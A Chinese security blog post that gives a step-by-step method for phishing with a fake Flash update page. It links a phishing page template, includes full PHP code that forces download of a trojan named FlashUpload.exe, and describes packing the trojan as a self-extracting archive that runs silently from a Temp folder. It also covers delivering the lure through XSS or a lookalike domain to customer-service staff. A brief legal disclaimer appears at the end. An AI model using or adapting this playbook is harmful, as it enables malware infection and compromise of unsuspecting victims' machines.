干货!速来! | Flash钓鱼手法分享(含完整代码)

前言

前几天看了一篇土司的实战文章,操作骚的一批,而且师傅把钓鱼源码传到了github上我拿过来研究一下

  • 免杀钓鱼的手法百试不爽,很多情况下比0day要好用很多,尤其是针对目标网站实在是没有什么可利用的漏洞的时候。

  • 我们本次设想的环境是能够找到xss,这个漏洞不难找的,很多大厂也无法避免这种漏洞,骚就骚在怎么利用这个漏洞将我们的木马加以隐藏,因为正常情况下一个跟你不是很熟的人很难点我们直接发过去的马,即便是做过伪装的。

一、环境搭建

首先一台服务器,搭建我们的钓鱼页面,钓鱼页面也是表哥给的
https://github.com/r00tSe7en/Flash-Pop
我们拿来之后安装到服务器上

图片


这里flash.js中的location.href会帮我们跳转到指定位置

图片


访问尝试:

图片


是不是很逼真呢哈哈
目标点击立即升级之后就会跳转到我们的链接

二、配置木马下载

我们要的效果是点击立即升级之后木马会立即下载,其次页面要做的逼真不能穿帮
配置访问下载的php

  1. <?php

  2. header("Content-type:text/html;charset=utf-8");

  3. $file_name="FlashUpload.exe";

  4. //解决中文不能显示出来的问题

  5. $file_name=iconv("utf-8","gb2312",$file_name);

  6. $path1=$_SERVER['DOCUMENT_ROOT'];

  7. $filepath=$path1."/".$file_name;

  8. //判断文件是否存在

  9. if(!file_exists($filepath)){

  10. echo "没有该文件文件";

  11. return ;

  12. }

  13. $fp=fopen($filepath,"r");

  14. $file_size=filesize($filepath);

  15. //下载文件需要用到的头

  16. Header("Content-type: application/octet-stream");

  17. Header("Accept-Ranges: bytes");

  18. Header("Accept-Length:".$file_size);

  19. Header("Content-Disposition: attachment; filename=".$file_name);

  20. $buffer=1024;

  21. $file_count=0;

  22. //向浏览器返回数据

  23. while(!feof($fp) && $file_count<$file_size){

  24. $file_con=fread($fp,$buffer);

  25. $file_count+=$buffer;

  26. echo $file_con;

  27. }

  28. fclose($fp);

  29. ?>

访问之后会下载当前目录下的FlashUpload.exe文件,路径和文件名根据自己的来

图片

三、木马自解压

将木马添加到压缩文件,勾选上自解压格式和删除原来文件

图片


在高级选项中选择自解压选项
解压路径选择C盘的某个Temp就好(推荐)

图片


配置上解压自动运行

图片


模式里边选择全部隐藏,这个地方隐藏之后是看不到解压界面的,双击之后直接复制到目录运行

图片

四:sg触发

通过XSS或者搞一个和目标网站比较接近的域名,向客服代理商之类的进行发送,后续就是等待上线触发了。

图片


点击运行上线

图片

当然没有授权的话不要乱搞哈

无 偿 获 取 网络安全优质学习资料与干货教程

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值